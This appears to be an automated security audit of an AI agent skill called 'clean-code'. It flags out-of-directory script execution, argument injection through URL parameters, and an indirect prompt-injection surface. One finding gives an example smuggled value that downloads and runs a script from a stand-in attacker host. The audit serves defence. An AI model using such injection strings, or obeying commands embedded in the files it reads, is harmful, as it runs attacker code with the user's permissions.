clean-code
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (MEDIUM): The skill mandates the execution of multiple Python scripts located outside its own directory structure.
- Evidence: The 'Verification Scripts' section contains commands such as
python ~/.claude/skills/vulnerability-scanner/scripts/security_scan.py .. - Risk: These dependencies are unverifiable from the skill's context. If the
~/.claude/skills/directory is compromised or contains scripts with vulnerabilities, the agent will execute them with full user permissions. - [COMMAND_EXECUTION] (MEDIUM): Potential for argument injection in verification commands.
- Evidence: Commands like
python ~/.claude/skills/performance-profiling/scripts/lighthouse_audit.py <url>andplaywright_runner.py <url>take raw user input. - Risk: Without explicit instructions for the agent to sanitize the
<url>or file path parameters, there is a risk of command injection (e.g., providinghttps://example.com; curl attacker.com/malicious.sh | bash) depending on how the underlying system handles shell execution. - [COMMAND_EXECUTION] (MEDIUM): High Indirect Prompt Injection Surface (Category 8).
- Ingestion points: The skill processes the entire current directory (
.) and user-provided URLs. - Boundary markers: None present; the skill lacks delimiters or instructions to ignore embedded commands within the files or web pages it analyzes.
- Capability inventory: The skill possesses powerful
Read,Write, andEditpermissions, combined with the ability to execute subprocesses via Python. - Sanitization: No sanitization or validation logic is defined for the external data ingested from the project files or remote URLs.
Audit Metadata